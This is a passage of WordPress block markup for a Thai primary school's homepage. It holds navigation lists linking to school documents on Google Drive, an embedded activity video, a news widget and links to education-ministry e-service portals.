wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล 